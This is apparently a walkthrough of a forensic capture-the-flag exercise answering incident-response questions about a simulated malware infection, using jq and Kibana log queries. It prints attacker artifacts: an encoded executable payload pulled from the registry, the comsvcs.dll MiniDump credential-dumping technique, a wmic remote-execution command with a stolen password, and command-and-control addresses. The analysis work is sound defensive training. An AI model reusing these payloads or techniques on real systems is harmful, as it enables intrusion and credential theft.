Magnify logo

Intro

The second in a two part series CyberDefenders.org, have a fun forensic CTF. The objective is to answer a series of typical incident response questions surrounding a malware infection.

You are provided with the following files to aid in your analysis:

  • Json dump of necessary log files (you can use jq)
  • Elastic Stack with Kibana Graphical interface

Walkthrough

1) The Threat Hunting process usually starts with the analyst making a hypothesis about a possible compromise vector or techniques used by an attacker. In this scenario, your initial hypothesis is as follows: “The attacker used the WMI subscription mechanism to obtain persistence within the infrastructure”. Verify this hypothesis and find the name of the WMI Event Consumer used by the attacker to maintain his foothold.

cat cyberpolygon-2020-data.json|jq 'select(._source.event_id=="5861")'

or in kibana

event_id:5861

Answer:

 PowerControl Consumer

2) In the previous step, you looked for traces of the attacker’s persistence in the compromised system through a WMI subscription mechanism. Now find the process that installed the WMI subscription. Answer the question by specifying the PID of that process and the name of its executable file, separated by a comma without spaces.

Look for the process that creates:

  • C:\Users\john.goldberg\AppData\Roaming\Microsoft\Office\MSO1033.ps1

Answer:

 5772,winword.exe

3) The process described in the previous question was used to open a file extracted from the archive that user received by email. Specify a SHA256 hash of the file extracted and opened from the archive.

jq was easier here:

cat cyberpolygon-2020-data.json |jq 'select(._source.proc_id==5772)'|grep ".doc"|grep -v "_doc"|sort|uniq
cat cyberpolygon-2020-data.json |jq 'select(._source.proc_id==5772)'|grep -A50 -B10 "Temp1_Report.zip"

Word doc: C:!Work\Marketing\Docs\OPEC\OPEC crude oil production.docx

Answer:

 54dabbd0a47f5ef839de9183978b9b755c248c8ad7a35aff3fe537990ffb3501

4) The file mentioned in question 3, is not malicious in and of itself, but when it is opened, another file is downloaded from the Internet that already contains the malicious code. Answer the question by specifying the address, from which this file was downloaded, and the SHA256 hash of the downloaded file, separated by commas without spaces.

  • IP - easy enough get from the URL file
  • Hash - you need the hash of a malicious docm or dotm loaded
cat cyberpolygon-2020-data.json |grep "OPEC crude oil production.docx"|grep dotm|tail -n1

Answer:

 188.135.15.49,65df8039cbd1b3fb40a1cc9198c2ba314dd38ff7d301ee475327d438346d96af

5) The malicious code from the file, mentioned in question 4, directly installed a WMI subscription, which we started our hunting with, and also downloaded several files from the Internet to the compromised host. For file downloading, the attacker used a tricky technique that gave him the opportunity to hide the real process, which initiated the corresponding network activity. Specify the SHA256 hash of the operating system component whose functionality was used by the attacker to download files from the Internet.

We at Netsyclla feel the question is rather vague against the number of exe’s and dll’s loaded. We know:

  • Either Winword or Iexplore (default browser) are open at this time
  • VBA macros can load wmi or powershell
  • lolbas binaries could also be used

Instead concentrate on the PID of winword and the document: 5772, iexplore and loaded dlls, and Mitre Att&ck T1071

Answer:

5516176cd0f4204ef8cf563c1dd6b3991b134d17eef2cc5e62e7f6c7aadfbb37

6) Specify the domain name of the resource from which the files mentioned in question 5 were supposedly downloaded as a result of malicious code execution.

Answer:

raw.githubusercontent.com

7) The first file downloaded (as a result of executing the code in question 5) contained encoded executable code (PE), which after downloading was recorded in the registry. Specify an MD5 hash of the original representation of that code (PE).

  • process (winword.exe) = 5772
  • event_type = registryvalueset
  • enrich.ioa.rules= win_gzipped_as_reg_value_data
H4sIAAAAAAAEAO1YX0wcRRz+7XEUCuWOkhCJGl3IRiGpV/6ooQnqTbmLc+2hx4FwEKVcuW0Bjztyf1KqtYUAhs2GxAQftPHBGH2xPmhSUzz/
5Ci1eAk1WHNafVCCxdJCE9qHpibV9Te7exQE25cqL/
cls99vZ7759jezM5O9q2t9AzIAwIhFUQDGQYMV7o4ZLKaHYyY4ufVc8TjnPFfc2NkV5ntDwYMhbw/f4Q0EghF+v8iHogG+K8Dbnm/
ge4I+0ZKXlyPoHofv3x1/6tUdY6kyO3Rp7Gk1fmzsCeTysumxGpWvq+zu6uhkun/LyWUH8L1uhAe25jWk6pahhM81bAMwsIS1uo+34yVfDfs5
0GNs36L32bJiqE+O2tzOpTqlaP39mhDaeYDS1QlaAQS4B0BfeodmS0TsiyDPcbAyttQ4Vlm0W0I+b8QL4Oe0ClW3Za0OU7ZaNBnkZeOlHEsOl
ux1urilVxMKeoXqV7De7+4DTOP/AJUahXwqOYVsOrhURGWbwFPJhndTRvUVpngxl8pGgSpxKiGhrJTuMgrh+1iYfRZ1jNVm5MXv6eCZosnpDU
AHlsYzAWKdzHvUKfQuvKIoypRN6NVqbIKHWVAW9bLISrGxWkvFJrCVB8ilNo15dm+vStir4nS0cOejAFUJpfAZM8Bw3Dx0gomGhHxc2xm4Cej
om8IsM5KdQrtSWGzWLKxYRT5jm4SMsyVddZ4JPEphvpnNj01w0dSTUIYC52jm1w8xm0Zs0qRXTdoUuKg0JFzg4J/P+tK0Eh6/
HR7TQzSImLTUGdOBM2yONpw/J+ZTtPqdVeNTWZL84BGB5yKGxcyFt/5SlHG2n/EtVE/e+f3P8Br/
ovOSzrd0NhVrXKLzkzrT4rU+nIkDUwlylgGyuFPAFXBQsB9ghL+taWN9eNgQ9yqPY1DrD4ZF6g34/CJ4OHtfV6SxMyR6fQAnjG4xHO0RU/c/
Qi0GEdEVCnaI4TDBVW54VtTltcGAdoRWZzasq/sws6krFIl6/cTvD3bY+wBuZjaHulas6sSeYOgwwF67+zm7s6rS4vP7Nx73ZuMWHby4vDCNE
aknLnd9E604L1LZ3Y4FjwM3T+WQi5pP7dlTV5GgFfGParxHDDt4MpHII9zE3FU3qWcqeXcN5WYODPQV5RrMwyG0k/tH8EqH45GD2OKSaZFNtv
IObua3JqokiPz4COV+0D11t+rZ6DVnBi5r+67vohc8qBdQf4DI2yjGD2JMZCN2myEe4mlraUVqIa24B3jiVmbxppXKBZf34nnykuOrQ+HKfVW
VOKwmh/Q7njrv4oZwSPOOLwzAfd72yZ9HSaNDuuiUrpGY89AjWUrSKV3p5FDUQmJl/
S+DkuzOIW0uF6ZYVxFXT7bT6nWCxK6Yf51VklSa6s4nHqc0R6U/SOztDyJeJYnjzXEo30bnF9gnCuaGG3UOPbqNxKPKDD99s09JDt6Eoy/
g9uTbpBvdVtLSqR4/qLhOKxIk5nm/YZ49YNIhTWFnh7RMpZ/
Xdn+t1EOasZ+V9euGVhLL3WkuV5LNmH80UIepYBqXa3AyKDdJy87S4RvRk0S5hNoWx9Tp5U/
fa1KSm7r00kgjjTTS2ETgT3P8NsEvFLFP3Oxc0tgE4HfHi1goD9CL/M52ABev/T8yh8XDb3J+afyn+BulDDBxABQAAA==

Answer:

 d9fa159c50e2f4d696bca970526dfc4d

8) The second file downloaded (as a result of code execution, which we talked about in question 5) was a script, that was set up to autostart via WMI Subscription. Specify the SHA256 hash of this script.

Kibana:

  • seach on ps1
  • filter on event_seq between 58 and 64
  • carve out the powershell but sha is 3EAD426B8FE932251C0CC37023714F1A8CB90E810D21223E37621331E699EF57

jq:

  • Cycle through the event_seq id to extract the powershell source 
    cat cyberpolygon-2020-data.json |jq 'select(._source.event_seq==58)'|jq ._source.script_text
  • but requires tidying up due to escaped "
  • Powershell source SHA256 on (linux) is 3EAD426B8FE932251C0CC37023714F1A8CB90E810D21223E37621331E699EF57 so use unix2dos program to restore \r\n

Answer:

6df4709bc07356968fb0e94985ddd1835d0458b22aab6a371784826109e49ef5

9)The script, mentioned in question 8, spawned one of the legitimate system processes and injected into its memory a malicious code that was read and decoded from the registry (this code was mentioned in question 7). This malicious code migrated through a chain of code injections to the address space of another legitimate process, where it continued to run without further migration. For this answer, provide the next data, separated by a comma without spaces:

  • PID of the initial legitimate system process, which was spawned by the script and where this script launched in-memory execution of malicious code;
  • 8876 the inital dwm.exe process 19bdc9f2-9843-49f2-b41a-50d4584bac29
  • PID of the target process, to which malicious code migrated from the initial process and in the context of which attacker performed different post-exploitation activity
  • 1160 spoofed winlogin ppid from _id=19bdc9f2-9843-49f2-b41a-50d4584bac29

Answer:

8876,1160

10) The malicious code run by the script is a Reverse Shell. Identify the IP address and port number of its command center.

  • “event_type”:”NetworkConnection”
  • powershell
  • “enrich.ioa.rules”:”win_suspicious_powershell_download_cradles”

Answer:

 94.177.253.126:443

11) As a result of running a malicious code, which we talk about in questions 9 and 10, the attacker got a shell on the compromised host. Using this access, the attacker downloaded the Active Directory collection utility to the host in an encoded form. Specify a comma-separated, non-spaced link where the encoded version of the utility was downloaded and a SHA256 hash of the decoded version that was directly run by the attacker on the compromised host.

1.first part easy to work out following certutil 2.bit tricker used egrep on the fake svchost.exe to find the right hash

Answer:

 http://188.135.15.49/chrome_installer.log2,EB41B254964FB046656A7312C8547674577C4A2229360CC12F5B1289280B92C3

12) During the post-exploitation process, the attacker used one of the standard Windows utilities to create a memory dump of a sensitive system process that contains credentials of active users in the system. Specify the name of the executable file of the utility used and the name of the memory dump file created, separated by a comma without spaces.

grep "comsvcs.dll,MiniDump" cyberpolygon-2020-data.json

Answer:

rundll32.exe,dump.bin

13) Presumably, the attacker extracted the password of one of the privileged accounts from the memory dump we discussed in the previous question and used it to run a malicious code on one of the domain controllers. What account are we talking about? Specify its username and password as the answer in login:password format.

cat cyberpolygon-2020-data.json |grep "wmic"
...
"cmdline":"wmic  /node:192.168.184.100 /user:inventory /password:jschindler35 process call create
...

Answer:

 inventory:jschindler35

14) A compromised user account is a member of two Built-in privileged groups on the Domain Controller. The first group is the Administrators. Find the second group. Provide the SID of this group as an answer.

Look for “Category”:”Inventory Information Collected” and Backup Operators = S-1-5-32-551

Answer:

 S-1-5-32-551

15) As a result of malicious code execution on the domain controller using a compromised account, the attacker got a reverse shell on that host. This shell used a previously not seen IP address as the command center. Specify its address as the answer.

shell script and jq magic to filter out powershell reverse shells from the DC:

cat cyberpolygon-2020-data.json |grep "DC01-CYBERCORP.cybercorp.com"|grep powershell|jq ._source.net_dst_ipv4|grep -v null|sort|uniq -c |sort -rn
     15 "0.0.0.0"
      3 "94.177.253.126"
      1 "190.150.52.34"

Answer:

 190.150.52.34
Share on: